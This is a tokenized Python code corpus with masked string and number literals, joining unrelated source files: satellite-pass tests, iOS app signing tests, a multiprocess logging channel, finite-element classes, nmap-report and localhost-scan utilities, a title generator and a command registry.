<EOL> pass_models . PassSlots . objects . propagate ( ) <EOL> sc_passes_n_1 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> pass_models . PassSlots . objects . propagate ( ) <EOL> sc_passes_n_2 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> self . assertEquals ( sc_passes_n_1 , sc_passes_n_2 ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> interval = ( <EOL> sn_misc . get_next_midnight ( ) + py_timedelta ( days = <NUM_LIT:30> ) , <EOL> sn_misc . get_next_midnight ( ) + py_timedelta ( days = <NUM_LIT> ) <EOL> ) <EOL> pass_models . PassSlots . objects . propagate ( interval = interval ) <EOL> sc_passes_n_3 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> self . assertGreater ( sc_passes_n_3 , sc_passes_n_2 ) <EOL> pass_models . PassSlots . objects . propagate ( interval = interval ) <EOL> sc_passes_n_4 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> self . assertEquals ( sc_passes_n_4 , sc_passes_n_3 ) </s>
<s> from isign_base_test import IsignBaseTest <EOL> import os <EOL> from os . path import exists <EOL> from isign import isign <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> class TestPublicInterface ( IsignBaseTest ) : <EOL> def _test_signable ( self , filename , output_path ) : <EOL> self . resign ( filename , output_path = output_path ) <EOL> assert exists ( output_path ) <EOL> assert os . path . getsize ( output_path ) > <NUM_LIT:0> <EOL> self . unlink ( output_path ) <EOL> def _test_unsignable ( self , filename , output_path ) : <EOL> with self . assertRaises ( isign . NotSignable ) : <EOL> self . resign ( filename , output_path = output_path ) <EOL> self . unlink ( output_path ) <EOL> def test_app ( self ) : <EOL> self . _test_signable ( self . TEST_APP , self . get_temp_dir ( ) ) <EOL> def test_app_ipa ( self ) : <EOL> self . _test_signable ( self . TEST_IPA , self . get_temp_file ( ) ) <EOL> def test_app_with_frameworks_ipa ( self ) : <EOL> self . _test_signable ( self . TEST_WITH_FRAMEWORKS_IPA , self . get_temp_file ( ) ) <EOL> def test_non_app_txt ( self ) : <EOL> self . _test_unsignable ( self . TEST_NONAPP_TXT , self . get_temp_file ( ) ) <EOL> def test_non_app_ipa ( self ) : <EOL> self . _test_unsignable ( self . TEST_NONAPP_IPA , self . get_temp_file ( ) ) <EOL> def test_simulator_app ( self ) : <EOL> self . _test_unsignable ( self . TEST_SIMULATOR_APP , self . get_temp_file ( ) ) </s>
<s> import select <EOL> import logging <EOL> import time <EOL> import socket <EOL> import cPickle as pickle <EOL> from multiprocessing import Process , Pipe <EOL> from functools import partial <EOL> try : <EOL> import errno <EOL> except ImportError : <EOL> errno = None <EOL> EINTR = getattr ( errno , '<STR_LIT>' , <NUM_LIT:4> ) <EOL> import monocle <EOL> from monocle import _o , Return , launch <EOL> from monocle . core import Callback <EOL> from monocle . stack . network import add_service , Client <EOL> from monocle . stack . multiprocess import PipeChannel , SocketChannel , get_conn , make_subchannels , Service <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> subproc_formatter = logging . Formatter ( "<STR_LIT>" ) <EOL> @ _o <EOL> def log_receive ( chan ) : <EOL> root = logging . getLogger ( '<STR_LIT>' ) <EOL> while True : <EOL> levelno , msg = yield chan . recv ( ) <EOL> for h in root . handlers : <EOL> h . old_formatter = h . formatter <EOL> h . setFormatter ( subproc_formatter ) <EOL> log . log ( levelno , msg ) <EOL> for h in root . handlers : <EOL> h . setFormatter ( h . old_formatter ) <EOL> class SyncSockChannel ( object ) : <EOL> def __init__ ( self , sock ) : <EOL> self . sock = sock <EOL> def _sendall ( self , data ) : <EOL> while data : <EOL> try : <EOL> r = self . sock . send ( data ) <EOL> except socket . error , e : <EOL> if e . args [ <NUM_LIT:0> ] == EINTR : <EOL> continue <EOL> raise <EOL> data = data [ r : ] <EOL> def _recv ( self , count ) : <EOL> result = "<STR_LIT>" <EOL> while count : <EOL> try : <EOL> data = self . sock . recv ( min ( count , <NUM_LIT> ) ) <EOL> except socket . error , e : <EOL> if e . args [ <NUM_LIT:0> ] == EINTR : <EOL> continue <EOL> raise <EOL> else : <EOL> count -= len ( data ) <EOL> result += data <EOL> return result <EOL> def send ( self , value ) : <EOL> p = pickle . dumps ( value ) <EOL> self . _sendall ( str ( len ( p ) ) ) <EOL> self . _sendall ( "<STR_LIT:\n>" ) <EOL> self . _sendall ( p ) <EOL> def recv ( self ) : <EOL> l = "<STR_LIT>" <EOL> while True : <EOL> x = self . _recv ( <NUM_LIT:1> ) <EOL> if x == "<STR_LIT:\n>" : <EOL> break <EOL> l += x <EOL> l = int ( l ) <EOL> p = self . _recv ( l ) <EOL> try : <EOL> value = pickle . loads ( p ) <EOL> except Exception : <EOL> log . exception ( "<STR_LIT>" , p ) <EOL> raise <EOL> return value <EOL> def poll ( self ) : <EOL> r , w , x = select . select ( [ self . sock ] , [ ] , [ self . sock ] , <NUM_LIT:0> ) <EOL> if r + x : <EOL> log . info ( "<STR_LIT>" ) <EOL> return True <EOL> else : <EOL> return False <EOL> class SockChannelHandler ( logging . Handler ) : <EOL> def __init__ ( self , sock ) : <EOL> logging . Handler . __init__ ( self ) <EOL> self . sock = sock <EOL> def setFormatter ( self , formatter ) : <EOL> self . formatter = formatter <EOL> def send ( self , record ) : <EOL> if record . args and isinstance ( record . args , tuple ) : <EOL> args = record . args <EOL> new_args = [ ] <EOL> for arg in args : <EOL> if isinstance ( arg , str ) : <EOL> new_args . append ( arg . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) ) <EOL> else : <EOL> new_args . append ( arg ) <EOL> record . args = tuple ( new_args ) <EOL> self . sock . send ( ( record . levelno , self . formatter . format ( record ) ) ) <EOL> def emit ( self , record ) : <EOL> try : <EOL> self . send ( record ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> self . handleError ( record ) <EOL> def close ( self ) : <EOL> logging . Handler . close ( self ) <EOL> class SyncSockSubchan ( object ) : <EOL> def __init__ ( self , chan , subchan ) : <EOL> self . chan = chan <EOL> self . subchan = subchan <EOL> def send ( self , value ) : <EOL> return self . chan . send ( { '<STR_LIT>' : self . subchan , <EOL> '<STR_LIT:content>' : value } ) <EOL> def recv ( self ) : <EOL> value = self . chan . recv ( ) <EOL> assert value [ '<STR_LIT>' ] == self . subchan <EOL> return value [ '<STR_LIT:content>' ] <EOL> def poll ( self ) : <EOL> return self . chan . poll ( ) <EOL> def _wrapper_with_sockets ( target , port , * args , ** kwargs ) : <EOL> sock = socket . socket ( ) <EOL> while True : <EOL> try : <EOL> sock . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" , port , type ( e ) , str ( e ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> sock . close ( ) <EOL> sock = socket . socket ( ) <EOL> else : <EOL> break <EOL> try : <EOL> formatter = logging . Formatter ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> chan = SyncSockChannel ( sock ) <EOL> handler = SockChannelHandler ( SyncSockSubchan ( chan , '<STR_LIT>' ) ) <EOL> handler . setFormatter ( formatter ) <EOL> root = logging . getLogger ( '<STR_LIT>' ) <EOL> root . addHandler ( handler ) <EOL> root . setLevel ( logging . DEBUG ) <EOL> target ( SyncSockSubchan ( chan , '<STR_LIT>' ) , * args , ** kwargs ) <EOL> finally : <EOL> log . info ( "<STR_LIT>" ) <EOL> sock . shutdown ( socket . SHUT_RDWR ) <EOL> sock . close ( ) <EOL> @ _o <EOL> def launch_proc_with_sockets ( target , port , * args , ** kwargs ) : <EOL> args = [ target , port ] + list ( args ) <EOL> p = Process ( target = _wrapper_with_sockets , args = args , kwargs = kwargs ) <EOL> p . start ( ) <EOL> cb = Callback ( ) <EOL> get_chan_service = partial ( get_conn , cb ) <EOL> service = Service ( get_chan_service , port , bindaddr = "<STR_LIT:127.0.0.1>" , backlog = <NUM_LIT:1> ) <EOL> service . _add ( ) <EOL> conn = yield cb <EOL> yield service . stop ( ) <EOL> chan = SocketChannel ( conn ) <EOL> main_chan , log_chan = make_subchannels ( chan , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> launch ( log_receive , log_chan ) <EOL> yield Return ( p , main_chan ) <EOL> class PipeHandler ( logging . Handler ) : <EOL> def __init__ ( self , pipe ) : <EOL> logging . Handler . __init__ ( self ) <EOL> self . pipe = pipe <EOL> def setFormatter ( self , formatter ) : <EOL> self . formatter = formatter <EOL> def send ( self , record ) : <EOL> if record . args and isinstance ( record . args , tuple ) : <EOL> args = record . args <EOL> new_args = [ ] <EOL> for arg in args : <EOL> if isinstance ( arg , str ) : <EOL> new_args . append ( arg . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) ) <EOL> else : <EOL> new_args . append ( arg ) <EOL> record . args = tuple ( new_args ) <EOL> self . pipe . send ( self . formatter . format ( record ) ) <EOL> def emit ( self , record ) : <EOL> try : <EOL> self . send ( record ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> self . handleError ( record ) <EOL> def close ( self ) : <EOL> logging . Handler . close ( self ) <EOL> def _wrapper_with_pipes ( target , log_pipe , pipe , * args , ** kwargs ) : <EOL> formatter = logging . Formatter ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pipehandler = PipeHandler ( log_pipe ) <EOL> pipehandler . setFormatter ( formatter ) <EOL> target ( pipe , * args , ** kwargs ) <EOL> def launch_proc_with_pipes ( target , * args , ** kwargs ) : <EOL> log_child , log_parent = Pipe ( ) <EOL> child , parent = Pipe ( ) <EOL> args = [ target , log_child , child ] + list ( args ) <EOL> p = Process ( target = _wrapper_with_pipes , args = args , kwargs = kwargs ) <EOL> p . start ( ) <EOL> launch ( log_receive , PipeChannel ( log_parent ) ) <EOL> return p , parent </s>
<s> from mapy . reader import user_setattr <EOL> class SPC ( object ) : <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , inputs ) : <EOL> self . card = None <EOL> self . entryclass = None <EOL> self . id = None <EOL> self . gridid = None <EOL> self . dof = None <EOL> self . displ = None <EOL> self . g2 = None <EOL> self . c2 = None <EOL> self . d2 = None <EOL> self . model = None <EOL> self . conscount = None <EOL> self = user_setattr ( self , inputs ) <EOL> if self . dof . __class__ . __name__ < > '<STR_LIT:list>' : <EOL> str_dof = self . dof <EOL> self . dof = set ( [ int ( dof ) for dof in str_dof ] ) <EOL> def add2model ( self , model ) : <EOL> self . model = model <EOL> model . conscount += <NUM_LIT:1> <EOL> self . conscount = model . conscount <EOL> model . consdict [ model . conscount ] = self <EOL> if self . g2 : <EOL> print '<STR_LIT>' % str ( self . g2 ) <EOL> def add2grid ( self , model ) : <EOL> grid = model . griddict [ int ( self . gridid ) ] <EOL> subcase = int ( self . id ) <EOL> for dof in self . dof : <EOL> grid . add_cons ( subcase , dof ) </s>
<s> from mapy . reader import user_setattr <EOL> from mapy . model . properties import Properties <EOL> class Prop2D ( Properties ) : <EOL> def __init__ ( self ) : <EOL> super ( Prop2D , self ) . __init__ ( ) <EOL> class PropShell ( Prop2D ) : <EOL> def __init__ ( self , inputs ) : <EOL> super ( PropShell , self ) . __init__ ( ) <EOL> self = user_setattr ( self , inputs ) <EOL> def build_C ( self ) : <EOL> import scipy <EOL> Emat = self . matobj . e <EOL> if self . matobj . nu : <EOL> Gmat = Emat / ( <NUM_LIT> * ( <NUM_LIT:1> + self . matobj . nu ) ) <EOL> else : <EOL> Gmat = self . matobj . g <EOL> self . matobj . nu = Emat / Gmat / <NUM_LIT> - <NUM_LIT:1> <EOL> nu = self . matobj . nu <EOL> self . C = ( Emat / ( <NUM_LIT:1> - nu ** <NUM_LIT:2> ) ) * scipy . array ( [ [ <NUM_LIT:1> , nu , <NUM_LIT:0> ] , [ nu , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , ( <NUM_LIT:1> - nu ) / <NUM_LIT:2> ] ] ) </s>
<s> from libnmap . parser import NmapParser <EOL> from elasticsearch import Elasticsearch <EOL> from datetime import datetime <EOL> import pygeoip <EOL> def store_report ( nmap_report , database , index ) : <EOL> rval = True <EOL> for nmap_host in nmap_report . hosts : <EOL> rv = store_reportitem ( nmap_host , database , index ) <EOL> if rv is False : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( nmap_host . address ) ) <EOL> rval = False <EOL> return rval <EOL> def get_os ( nmap_host ) : <EOL> rval = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> if nmap_host . is_up ( ) and nmap_host . os_fingerprinted : <EOL> cpelist = nmap_host . os . os_cpelist ( ) <EOL> if len ( cpelist ) : <EOL> mcpe = cpelist . pop ( ) <EOL> rval . update ( { '<STR_LIT>' : mcpe . get_vendor ( ) , <EOL> '<STR_LIT>' : mcpe . get_product ( ) } ) <EOL> return rval <EOL> def get_geoip_code ( address ) : <EOL> gi = pygeoip . GeoIP ( '<STR_LIT>' ) <EOL> return gi . country_code_by_addr ( address ) <EOL> def store_reportitem ( nmap_host , database , index ) : <EOL> host_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:address>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:status>" ] <EOL> jhost = { } <EOL> for hkey in host_keys : <EOL> if hkey == "<STR_LIT>" or hkey == "<STR_LIT>" : <EOL> val = getattr ( nmap_host , hkey ) <EOL> jhost [ hkey ] = datetime . fromtimestamp ( int ( val ) if len ( val ) else <NUM_LIT:0> ) <EOL> else : <EOL> jhost [ hkey ] = getattr ( nmap_host , hkey ) <EOL> jhost . update ( { '<STR_LIT>' : get_geoip_code ( nmap_host . address ) } ) <EOL> jhost . update ( get_os ( nmap_host ) ) <EOL> for nmap_service in nmap_host . services : <EOL> reportitems = get_item ( nmap_service ) <EOL> for ritem in reportitems : <EOL> ritem . update ( jhost ) <EOL> database . index ( index = index , <EOL> doc_type = "<STR_LIT>" , <EOL> body = ritem ) <EOL> return jhost <EOL> def get_item ( nmap_service ) : <EOL> service_keys = [ "<STR_LIT:port>" , "<STR_LIT>" , "<STR_LIT:state>" ] <EOL> ritems = [ ] <EOL> jservice = { } <EOL> for skey in service_keys : <EOL> jservice [ skey ] = getattr ( nmap_service , skey ) <EOL> jservice [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> jservice [ '<STR_LIT>' ] = nmap_service . service <EOL> jservice [ '<STR_LIT>' ] = nmap_service . banner <EOL> ritems . append ( jservice ) <EOL> for nse_item in nmap_service . scripts_results : <EOL> jnse = { } <EOL> for skey in service_keys : <EOL> jnse [ skey ] = getattr ( nmap_service , skey ) <EOL> jnse [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> jnse [ '<STR_LIT>' ] = nse_item [ '<STR_LIT:id>' ] <EOL> jnse [ '<STR_LIT>' ] = nse_item [ '<STR_LIT>' ] <EOL> ritems . append ( jnse ) <EOL> return ritems <EOL> xmlscans = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for xmlscan in xmlscans : <EOL> nmap_report = NmapParser . parse_fromfile ( xmlscan ) <EOL> if nmap_report : <EOL> rep_date = datetime . fromtimestamp ( int ( nmap_report . started ) ) <EOL> index = "<STR_LIT>" . format ( rep_date . strftime ( '<STR_LIT>' ) ) <EOL> db = Elasticsearch ( ) <EOL> j = store_report ( nmap_report , db , index ) </s>
<s> from libnmap . process import NmapProcess <EOL> from time import sleep <EOL> def make_nmproc_obj ( targets , options ) : <EOL> return NmapProcess ( targets = targets , options = options ) <EOL> def start_all_bg ( nmprocs ) : <EOL> for nmp in nmprocs : nmp . run_background ( ) <EOL> def any_running ( nmprocs ) : <EOL> return any ( [ nmp . is_running ( ) for nmp in nmprocs ] ) <EOL> def summarize ( nmprocs ) : <EOL> for nmp in nmprocs : <EOL> print ( "<STR_LIT>" . format ( nmp . rc , nmp . summary , len ( nmp . stdout ) ) ) <EOL> nm_targets = [ ] <EOL> for h in range ( <NUM_LIT:10> ) : <EOL> nm_targets . append ( "<STR_LIT:localhost>" ) <EOL> nm_opts = "<STR_LIT>" <EOL> nm_procs = [ make_nmproc_obj ( t , nm_opts ) for t in nm_targets ] <EOL> start_all_bg ( nm_procs ) <EOL> while any_running ( nm_procs ) : <EOL> print ( "<STR_LIT>" ) <EOL> sleep ( <NUM_LIT:2> ) <EOL> summarize ( nm_procs ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import random <EOL> NOUNS = ( <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> ) <EOL> ADJECTIVES = ( <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> ) <EOL> class Title ( object ) : <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def make_title ( self ) : <EOL> adj = random . choice ( ADJECTIVES ) <EOL> noun = random . choice ( NOUNS ) <EOL> noun2 = random . choice ( NOUNS ) <EOL> return random . choice ( [ <EOL> lambda : "<STR_LIT>" % ( adj , noun ) , <EOL> lambda : "<STR_LIT>" % ( adj , noun ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) <EOL> ] ) ( ) <EOL> def next ( self ) : <EOL> return self . make_title ( ) </s>
<s> commands = { } <EOL> def register ( name , function ) : <EOL> "<STR_LIT>" <EOL> if name in commands : <EOL> print ( "<STR_LIT>" % name ) <EOL> commands [ name ] = function <EOL> def command ( function ) : <EOL> "<STR_LIT>" <EOL> def canonical ( name ) : <EOL> return name . strip ( "<STR_LIT:_>" ) . replace ( "<STR_LIT:_>" , "<STR_LIT:->" ) <EOL> name = canonical ( function . __name__ ) <EOL> register ( name , function ) <EOL> return function <EOL> def named ( * names ) : <EOL> "<STR_LIT>" <EOL> def decorate ( function ) : <EOL> for name in names : <EOL> register ( name , function ) <EOL> return function <EOL> return decorate <EOL> events = { "<STR_LIT>" : { } , "<STR_LIT>" : { } , "<STR_LIT>" : { } } <EOL> def event ( name , concurrent = False ) : <EOL> "<STR_LIT>" <EOL> def decorate ( function ) : <EOL> function . concurrent = concurrent <EOL> events [ "<STR_LIT>" ] . setdefault ( name , [ ] ) <EOL> events [ "<STR_LIT>" ] [ name ] . append ( function ) <EOL> return function <EOL> return decorate <EOL> startups = [ ] <EOL> def startup ( function ) : <EOL> "<STR_LIT>" <EOL> startups . append ( function ) <EOL> return function <EOL> builders = [ ] <EOL> def builder ( function ) : <EOL> "<STR_LIT>" <EOL> builders . append ( function ) <EOL> return function <EOL> def clear ( ) : <EOL> "<STR_LIT>" <EOL> commands . clear ( ) <EOL> events [ "<STR_LIT>" ] . clear ( ) <EOL> events [ "<STR_LIT>" ] . clear ( ) <EOL> events [ "<STR_LIT>" ] . clear ( ) <EOL> del startups [ : ] <EOL> del builders [ : ] </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from scalyr_agent . scalyr_monitor import ScalyrMonitor <EOL> from scalyr_agent . scalyr_monitor import BadMonitorConfiguration <EOL> from scalyr_agent . scalyr_monitor import MonitorConfig <EOL> from scalyr_agent . scalyr_monitor import UnsupportedSystem <EOL> from scalyr_agent . scalyr_monitor import define_metric <EOL> from scalyr_agent . scalyr_monitor import define_config_option <EOL> from scalyr_agent . scalyr_monitor import define_log_field <EOL> from scalyr_agent . util import StoppableThread <EOL> from scalyr_agent . util import RunState <EOL> from scalyr_agent . scalyr_logging import getLogger <EOL> from scalyr_agent . scalyr_logging import AgentLogger <EOL> from scalyr_agent . scalyr_logging import DEBUG_LEVEL_0 , DEBUG_LEVEL_1 , DEBUG_LEVEL_2 <EOL> from scalyr_agent . scalyr_logging import DEBUG_LEVEL_3 , DEBUG_LEVEL_4 , DEBUG_LEVEL_5 <EOL> from scalyr_agent . scalyr_logging import 